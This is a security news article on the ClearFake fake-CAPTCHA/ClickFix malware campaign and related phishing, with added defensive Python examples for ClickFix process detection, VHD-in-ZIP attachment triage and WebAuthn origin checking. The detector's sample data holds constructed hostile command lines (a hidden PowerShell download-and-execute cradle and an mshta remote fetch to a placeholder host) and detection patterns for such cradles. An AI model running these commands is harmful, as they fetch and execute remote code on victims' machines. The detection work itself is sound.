The ClearFake campaign has infected at least 9,300 websites, employing fake reCAPTCHA and Cloudflare Turnstile verifications to lure users into downloading malicious software, including Lumma Stealer and Vidar Stealer. First identified in July 2023, ClearFake utilizes compromised WordPress sites as a vector for malware distribution, primarily relying on fake web browser update prompts.
ClearFake campaign infects 9,300 websites
ClearFake has also adopted the EtherHiding technique to enhance the resilience of its attack chain, utilizing Binance’s Smart Chain (BSC) contracts to fetch subsequent payloads. The primary objective of these infection chains is to deliver information-stealing malware targeting both Windows and macOS systems.
By May 2024, ClearFake had incorporated what is referred to as ClickFix, a social engineering tactic designed to trick users into executing malicious PowerShell code under the pretense of resolving a non-existent technical issue. According to Sekoia’s analysis, the new variant maintains its reliance on EtherHiding while also facilitating additional interactions with the Binance Smart Chain.
These interactions use the smart contract’s Application Binary Interface (ABI) to load multiple pieces of JavaScript code and additional resources. These resources fingerprint the victim’s system and then download, decrypt, and display the ClickFix lure. The latest ClearFake iteration has integrated Web3 capabilities to thwart analysis and encrypts the HTML code of the ClickFix lure.
The attack sequence begins when a user visits a compromised site, leading to the retrieval of intermediate JavaScript code from BSC. This JavaScript is responsible for fingerprinting the system and fetching the encrypted ClickFix code hosted on Cloudflare Pages. If the victim executes the malicious PowerShell command, the Emmenhtal Loader (also known as PEAKLIGHT) deploys, subsequently introducing Lumma Stealer. In late January 2025, an alternate attack chain was observed that used a PowerShell loader to install Vidar Stealer.
ClearFake operators have reportedly updated the framework code, lures, and payload distributions daily. The malware execution now relies on various data stored within the Binance Smart Chain, including JavaScript code, AES keys, URLs for lure HTML files, and ClickFix PowerShell commands. The prevalence of compromised websites suggests that this threat continues to pose a significant risk, with approximately 200,000 unique users potentially exposed to ClearFake lures in July 2024.
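The ClickFix step described above ends with the victim pasting a PowerShell or mshta command into a system dialog, which leaves a recognisable process-tree shape in endpoint telemetry: a script host spawned directly by the interactive shell (explorer.exe) with a command line that hides its window or pulls code from a remote URL. The following detection example is added here as an illustration and is not code from the article or from Sekoia; the event field names follow Sysmon process-creation events, the sample events and the lure hostnames are constructed, and the trait list is an assumption about what such commands typically contain rather than a catalogue of this campaign's actual commands.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in a Sysmon Event ID 1 style. Field names and
# command lines are assumptions for this example, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {   # ClickFix-style: command pasted into the Win+R dialog, so explorer.exe is the parent
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -w hidden -NoProfile -c "iwr https://lure.example.invalid/verify.txt | iex"',
        "User": r"CORP\jdoe",
    },
    {   # ClickFix-style variant: mshta fetching a remote HTA
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta.exe https://lure.example.invalid/captcha.hta",
        "User": r"CORP\jdoe",
    },
    {   # Benign: developer tooling running a local build script
        "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File .\build.ps1",
        "User": r"CORP\jdoe",
    },
    {   # Benign: a management agent running a deployed script as SYSTEM
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Patch\run.ps1",
        "User": r"NT AUTHORITY\SYSTEM",
    },
]

# The launch shape: an interactive shell as parent and a script host as child.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits common to "paste this to fix the problem" lures (assumed, not exhaustive).
TRAIT_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indow(?:style)?)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|invoke-expression|iex|downloadstring|net\.webclient|start-bitstransfer)\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def match_traits(event: dict) -> list[str]:
    """Return every trait the event exhibits, in a stable order."""
    traits = []
    if basename(event["ParentImage"]) in INTERACTIVE_PARENTS:
        traits.append("interactive_parent")
    if basename(event["Image"]) in SCRIPT_HOSTS:
        traits.append("script_host")
    for name, pattern in TRAIT_PATTERNS.items():
        if pattern.search(event["CommandLine"]):
            traits.append(name)
    return traits


def is_clickfix_candidate(event: dict) -> bool:
    """A hit needs the user-driven launch shape plus at least one command-line trait."""
    traits = set(match_traits(event))
    required = {"interactive_parent", "script_host"}
    return required <= traits and bool(traits - required)


def flagged_indices(events: list[dict]) -> list[int]:
    """Indices of the events worth an analyst's attention."""
    return [i for i, e in enumerate(events) if is_clickfix_candidate(e)]


if __name__ == "__main__":
    for i in flagged_indices(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["User"], match_traits(SAMPLE_EVENTS[i]))
```

Requiring the launch shape and a command-line trait together is what keeps the two benign events out of the result: a build script started from an editor and a SYSTEM-level agent both run PowerShell, but neither is spawned by the interactive shell with a hidden window or a download cradle. The trait list is deliberately generic, since the article notes the operators change their commands daily.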
In a related finding, over 100 auto dealership websites have been compromised with ClickFix lures that deploy SectopRAT malware. Security researcher Randy McEoin noted that this infection originated not from the dealerships’ own websites but from a third-party video service, LES Automotive (idostream[.]com), which has since removed the malicious JavaScript injection.
These developments coincide with various phishing campaigns aimed at distributing multiple malware families and harvesting credentials. Methods identified include virtual hard disk (VHD) files embedded in archived email attachments to deliver Venom RAT via a Windows batch script, and Microsoft Excel attachments that exploit a known security vulnerability (CVE-2017-0199) to download an HTML Application (HTA), which in turn uses Visual Basic Script (VBS) for further malware deployment.
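A disk image inside an archive is a container-in-a-container: mail gateways that only inspect the outer ZIP never see the batch script on the mounted VHD. The triage example below is added here as an illustration and is not code from the article or from any of the vendors it cites; it unpacks a ZIP in memory and flags members by extension and, for VHD files, by the "conectix" cookie that opens the 512-byte VHD footer, so a renamed image is caught as well. The archive and its contents are constructed dummy data, and the extension lists are assumptions.

```python
import io
import zipfile
from pathlib import PurePosixPath

DISK_IMAGE_EXTS = {".vhd", ".vhdx", ".iso", ".img"}
SCRIPT_EXTS = {".bat", ".cmd", ".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".lnk"}
VHD_COOKIE = b"conectix"          # first 8 bytes of the 512-byte VHD footer
MAX_MEMBER_BYTES = 64 * 1024 * 1024  # assumed cap; refuse to inflate anything larger


def looks_like_vhd(data: bytes) -> bool:
    """The VHD footer occupies the last 512 bytes of the file and starts with 'conectix'."""
    return len(data) >= 512 and data[-512:-504] == VHD_COOKIE


def member_reasons(name: str, data: bytes) -> list[str]:
    """Why a single archive member deserves a closer look (empty list means nothing found)."""
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    last = suffixes[-1] if suffixes else ""
    reasons = []
    if last in DISK_IMAGE_EXTS:
        reasons.append("disk_image_extension")
    if last in SCRIPT_EXTS:
        reasons.append("script_extension")
    if len(suffixes) >= 2 and last in DISK_IMAGE_EXTS | SCRIPT_EXTS:
        reasons.append("double_extension")          # e.g. Invoice.pdf.vhd
    if looks_like_vhd(data):
        reasons.append("vhd_footer")                # content check, independent of the name
    return reasons


def container_findings(archive_bytes: bytes) -> list[tuple[str, tuple[str, ...]]]:
    """Inspect every file in a ZIP held in memory; returns (member name, reasons) pairs."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_MEMBER_BYTES:   # guard against decompression bombs
                findings.append((info.filename, ("too_large_to_inspect",)))
                continue
            reasons = member_reasons(info.filename, zf.read(info))
            if reasons:
                findings.append((info.filename, tuple(reasons)))
    return sorted(findings)


def build_sample_archive() -> bytes:
    """Constructed archive standing in for an e-mail attachment; all content is dummy bytes."""
    fake_vhd = b"\x00" * 1024 + VHD_COOKIE + b"\x00" * 504   # footer starts 512 bytes from the end
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_2025.pdf.vhd", fake_vhd)        # disk image with a double extension
        zf.writestr("Statement.pdf", b"%PDF-1.4\n%dummy\n")  # harmless document
        zf.writestr("notes/renamed.dat", fake_vhd)           # disk image hiding behind a neutral name
        zf.writestr("run.bat", b"@echo off\r\n")             # batch script
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in container_findings(build_sample_archive()):
        print(f"{name}: {', '.join(reasons)}")
```

The content check matters more than the extension lists: a policy that blocks `.vhd` by name is defeated by renaming, whereas the footer cookie survives. A production version would recurse into nested archives and images rather than stopping at one level.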
Additionally, there are reports of exploiting misconfigurations in Microsoft 365 infrastructure to gain control of tenants, create administrative accounts, and deliver phishing content that evades email security measures, ultimately enabling credential harvesting and account takeover (ATO).
As social engineering tactics evolve, organizations must implement robust authentication and access-control mechanisms to guard against Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) techniques that facilitate account hijacking. A report from Mandiant highlighted the speed at which BitM frameworks can target websites, allowing attackers to serve legitimate sites through attacker-controlled browsers, complicating the distinction between genuine and fraudulent sites for victims.
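One concrete form of the "robust authentication" the paragraph calls for is origin-bound authentication such as WebAuthn/FIDO2: the browser, not the web page, writes the page's origin into the signed clientDataJSON, so a relying party that checks that field rejects an assertion produced while the victim was looking at a proxy on another domain. The example below is added as an illustration and is not code from the article, from Mandiant, or from any WebAuthn library; it implements only the clientDataJSON checks (ceremony type, challenge, origin) and omits the signature verification over the authenticator data and the hash of clientDataJSON, which is the step that stops a proxy from simply rewriting the origin field. The relying-party origin, the proxy hostname and the challenge are constructed values.

```python
import base64
import json
import secrets

EXPECTED_ORIGIN = "https://login.example.com"   # assumed relying-party origin
# Constructed fixed challenge; a real relying party generates a random one per ceremony.
CHALLENGE = bytes.fromhex("00112233445566778899aabbccddeeff")


def b64url_encode(raw: bytes) -> str:
    """WebAuthn uses unpadded base64url for the challenge."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    padded = text + "=" * (-len(text) % 4)
    return base64.urlsafe_b64decode(padded)


def make_client_data(origin: str, challenge: bytes, ceremony: str = "webauthn.get") -> bytes:
    """Simulates the clientDataJSON a browser builds; the browser fills in 'origin' itself."""
    payload = {"type": ceremony, "challenge": b64url_encode(challenge), "origin": origin, "crossOrigin": False}
    return json.dumps(payload).encode("utf-8")


def verify_client_data(client_data_json: bytes, expected_origin: str, expected_challenge: bytes,
                       expected_type: str = "webauthn.get") -> tuple[bool, str]:
    """Relying-party side checks on clientDataJSON; returns (accepted, reason)."""
    try:
        data = json.loads(client_data_json)
    except ValueError:
        return False, "clientDataJSON is not valid JSON"
    if data.get("type") != expected_type:
        return False, "unexpected ceremony type"
    try:
        challenge = b64url_decode(data.get("challenge", ""))
    except (ValueError, TypeError):
        return False, "challenge is not base64url"
    if not secrets.compare_digest(challenge, expected_challenge):   # constant-time compare
        return False, "challenge mismatch"
    # Origin binding: an assertion gathered on a proxy domain carries that domain here.
    if data.get("origin") != expected_origin:
        return False, "origin mismatch: " + repr(data.get("origin"))
    return True, "ok"


if __name__ == "__main__":
    genuine = make_client_data(EXPECTED_ORIGIN, CHALLENGE)
    proxied = make_client_data("https://login.example.com.proxy.invalid", CHALLENGE)
    print(verify_client_data(genuine, EXPECTED_ORIGIN, CHALLENGE))
    print(verify_client_data(proxied, EXPECTED_ORIGIN, CHALLENGE))
```

The second call fails even though the proxy relayed the correct challenge, because the only way to obtain a valid signature over a clientDataJSON naming the genuine origin is for the victim's browser to be on that origin. This is the property a relayed one-time code lacks, which is why the paragraph pairs "robust authentication" with AitM resistance.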
Featured image credit: Pixabay/Pexels